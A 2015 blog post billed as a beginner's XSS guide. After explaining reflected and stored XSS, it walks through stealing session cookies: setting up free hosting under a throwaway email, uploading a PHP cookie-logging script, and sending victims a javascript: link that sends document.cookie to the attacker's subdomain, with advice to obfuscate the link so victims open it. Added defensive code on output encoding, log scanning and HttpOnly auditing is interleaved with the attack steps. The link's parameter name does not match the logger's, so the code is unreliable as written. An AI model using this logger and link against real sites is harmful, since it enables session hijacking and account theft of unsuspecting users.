Tuesday, March 31, 2015

A beginner's guide to XSS attack

XSS, or cross-site scripting, is a type of computer security vulnerability found in web applications. In XSS, attacker-supplied script is injected into a page served by the remote server and then runs in the victim's browser, which is why it is also referred to as client-side scripting. According to statistics, 68% of websites on the internet are open to this attack and its varieties, and it became the most popular attack among information security researchers in 2007.

In this type of attack, a vulnerable web application, or JavaScript run from an unrelated website, is used to bypass the browser's same-origin policy (which permits scripts running on pages of the same origin to access each other's resources once a page is allowed the use of system resources), and various code-injection methods are used for this purpose.

There are mainly two types of XSS attacks.

1. Non-persistent XSS attack

In this kind of vulnerability, the attacker requires the user to open a specifically crafted link so that the vulnerability is exploited when the browser runs it. The delivery method for such an attack can be anything, ranging from an email to a simple message on Facebook. This is the more common type of XSS vulnerability, and because it is so common it is generally rated as a beginner-level XSS attack by security researchers, but even this can have dangerous outcomes.

2. Persistent XSS attack

The persistent (or stored) cross-site scripting attack is a very devastating attack simply because, once the attack is successfully pulled off, the code provided by the attacker is saved on the server and then permanently displayed on the pages that normal users land on in the normal course of browsing. The classic delivery system for such an attack is the message board where a user is allowed to post HTML-formatted messages for other users to read.
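To make the difference between the two types concrete from the defender's side, here is an added example (written for this page, not code from the original post): a tiny message-board renderer and a search page, each in a vulnerable form that concatenates user text straight into the markup and a hardened form that HTML-encodes it first. The function names, the stored message and the query string are all constructed for the demo.

```javascript
// Added example: output encoding is what decides whether "HTML formatted messages"
// become stored XSS, and whether an echoed query becomes reflected XSS.

// Minimal HTML entity encoder for text placed inside an element body or attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Stored case, vulnerable: the saved message is concatenated into the page as-is.
function renderPostUnsafe(author, body) {
  return `<div class="post"><b>${author}</b>: ${body}</div>`;
}

// Stored case, hardened: every untrusted field is encoded before it reaches the markup.
function renderPostSafe(author, body) {
  return `<div class="post"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Reflected case: a search page that echoes the query parameter back to the user.
function renderSearchUnsafe(q) {
  return `<p>Results for: ${q}</p>`;
}
function renderSearchSafe(q) {
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Heuristic check over rendered HTML: is there a raw <script> tag, an inline event
// handler inside a tag, or a javascript: URL? Good enough for a demo, not a parser.
function containsActiveContent(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=|javascript:/i.test(html);
}

// Constructed inputs: what a poster might type into the board, and a crafted query.
const storedMessage = "<script>alert(document.cookie)</script>";
const reflectedQuery = '"><img src=x onerror=alert(1)>';
```

Rendering `storedMessage` through `renderPostSafe` yields `&lt;script&gt;alert(document.cookie)&lt;/script&gt;`, which the browser displays as text and never executes; the unsafe renderer emits the tag verbatim. Encoding must be applied at output time for the context the text lands in (element body here; attribute, URL and JavaScript contexts need their own encoders).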

Today, we are going to have a look at how to pull off a very simple yet effective non-persistent XSS attack.

Step 1: Use a free web hosting service (like heliohost.org, x10hosting.com, 110mb.com, 000webhost.com, my3gb.com) to create a website whose domain name doesn't arouse much suspicion even when looked at carefully.
For the purpose of explaining, I managed to create the domain ht1234a.my3gb.com . On these websites, the username you provide during registration is generally used as a subdomain of your URL.

Advice: Don't use your regular email for this purpose, as you might become the target of another attacker or a "security researcher". I made a dummy email, htutorial1@gmail.com, for this guide's purpose.

Step 2: Now, on your computer, open Notepad and write the following code into the file exactly as it is given.

<?php
// Visitor's address; the original listing used $ip without defining it
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];
// One log record per request
$data = "IP: " . $ip . "\n" . "Cookie: " . $cookie . "\n" . "Referrer: " . $referer .
"\n" . "Browser: " . $browser . "\n\n";
$log = "cookies.txt";
@chmod($log, 777);
$f = fopen($log, 'a');
fwrite($f, $data);
fclose($f);
// Redirect the visitor after logging
@header("Location: http://www.google.com");

Step 3: Save this file as index.php.

Step 4: Now go to the File Manager of your hosting service and upload the index.php file we just created to the root directory of your domain, so that it is reachable as subdomain.hosting.com/index.php . Mine looks like ht1234a.my3gb.com/index.php .

Step 5: Now create an empty text file in which the above web application will store the logged cookies. The script writes to the file named in $log, so the empty file should be cookies.txt . After creating it, upload it to the root directory of the subdomain as well.

Now the preparation for the attack is done, and all we have to do is create a crafted link for our victim to open. In the link the web application is referenced as subdomain.hosting.com/index.php, so for this guide we use ht1234a.my3gb.com/index.php .

javascript: document.location = 'ht1234a.my3gb.com/index.php?isr=' .concat (escape (document.cookie));

This is the crafted link, in the form of JavaScript, which our victim needs to run for the attack to execute. As any keen observer might notice, the escape(document.cookie) part looks fishy. So we can encode it as ASCII or hex codes using a char() function so that it escapes the normal eye. Since the user won't normally understand the URL, the chances of him opening it increase a lot.
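The encoding trick above is exactly what a defender has to undo when looking for this kind of link in web-server logs. The following is an added example, not code from the original post: a small detection pass that pulls the request target out of access-log lines, percent-decodes it repeatedly (so that double-encoded payloads do not slip through), and matches it against a handful of signatures. The log lines, signature names and field layout are constructed for the demo.

```javascript
// Added example: spot crafted XSS links in access logs after undoing URL encoding.

// Signatures a defender might start with; names are constructed for this demo.
const SIGNATURES = [
  { name: "javascript-url", re: /javascript\s*:/i },
  { name: "cookie-read", re: /document\s*\.\s*cookie/i },
  { name: "script-tag", re: /<\s*script\b/i },
  { name: "charcode-obfuscation", re: /fromcharcode/i },
  { name: "event-handler", re: /\bon(error|load|click|mouseover)\s*=/i },
];

// Percent-decode repeatedly; stop when the string stops changing or is malformed.
function fullyDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, " ");
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Pull the request target out of a Common Log Format line: "METHOD /path?query HTTP/x".
function requestTarget(line) {
  const m = line.match(/"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Names of the signatures that fire for one line (empty array = nothing suspicious).
function classifyLine(line) {
  const target = requestTarget(line);
  if (!target) return [];
  const decoded = fullyDecode(target);
  return SIGNATURES.filter(s => s.re.test(decoded)).map(s => s.name);
}

// Scan a whole log; report only lines with at least one hit.
function scanLog(lines) {
  return lines
    .map((line, i) => ({ line: i + 1, hits: classifyLine(line) }))
    .filter(r => r.hits.length > 0);
}

// Constructed sample log: one benign request, one plain-encoded payload,
// one double-encoded javascript: URL in a redirect parameter.
const SAMPLE_LOG = [
  '203.0.113.5 - - [31/Mar/2015:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
  '203.0.113.7 - - [31/Mar/2015:10:00:02 +0000] "GET /search?q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 734',
  '203.0.113.9 - - [31/Mar/2015:10:00:03 +0000] "GET /index.php?redirect=%256Aavascript%253Aalert(1) HTTP/1.1" 302 0',
];
```

Running `scanLog(SAMPLE_LOG)` flags lines 2 and 3 and leaves line 1 alone. The repeated decoding is the important part: a single `decodeURIComponent` would turn `%256A` into `%6A` and the `javascript:` signature would miss it. Signature matching like this is a first filter, not proof; it should feed a review queue rather than block traffic on its own.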

The best way to protect yourself from such attacks is to open links only from reliable sources and to carefully examine every unknown link before you open it.
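User caution is one side of the defence; the other is on the server. The attack in this guide only yields anything because document.cookie can read the session cookie, and the HttpOnly attribute removes the cookie from script reach entirely (it does not stop the XSS itself, only the cookie theft). The following is an added example, not code from the original post: a Set-Cookie parser, an audit that lists which protections a cookie is missing, and a builder for a hardened session cookie. Header values and the list of required attributes are constructed for the demo.

```javascript
// Added example: audit Set-Cookie headers for the attributes that blunt cookie theft.

// Attributes a session cookie should carry; constructed baseline for this demo.
const REQUIRED = ["HttpOnly", "Secure", "SameSite"];

// Split "name=value; Attr; Attr=val" into its parts; attribute keys are lower-cased.
function parseSetCookie(header) {
  const parts = header.split(";").map(p => p.trim()).filter(Boolean);
  const [name, ...valueParts] = parts[0].split("=");
  const attrs = {};
  for (const p of parts.slice(1)) {
    const idx = p.indexOf("=");
    const key = idx === -1 ? p : p.slice(0, idx);
    const val = idx === -1 ? true : p.slice(idx + 1);
    attrs[key.trim().toLowerCase()] = val;
  }
  return { name: name.trim(), value: valueParts.join("="), attrs };
}

// Returns the missing protections; an empty list means the cookie is hardened.
function auditSetCookie(header) {
  const { attrs } = parseSetCookie(header);
  const missing = REQUIRED.filter(a => !(a.toLowerCase() in attrs));
  // SameSite=None is present but gives no cross-site protection, so flag it too.
  if ("samesite" in attrs && String(attrs.samesite).toLowerCase() === "none") {
    missing.push("SameSite=None (weak)");
  }
  return missing;
}

// Build a session cookie the way the audit expects it. Path and lifetime are examples.
function hardenedSessionCookie(name, value, { maxAge = 3600 } = {}) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Max-Age=${maxAge}; Secure; HttpOnly; SameSite=Lax`;
}
```

A typical PHP default of `PHPSESSID=abc123; Path=/` fails the audit on all three counts; the header produced by `hardenedSessionCookie` passes. With HttpOnly set, `escape(document.cookie)` in the crafted link simply never sees the session identifier, which is why it belongs on every authentication cookie regardless of how careful users are with links.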

Note: This tutorial is for educational purposes only. Use at your own risk. TheSmartHacks is not responsible for any type of loss caused due to this information!!
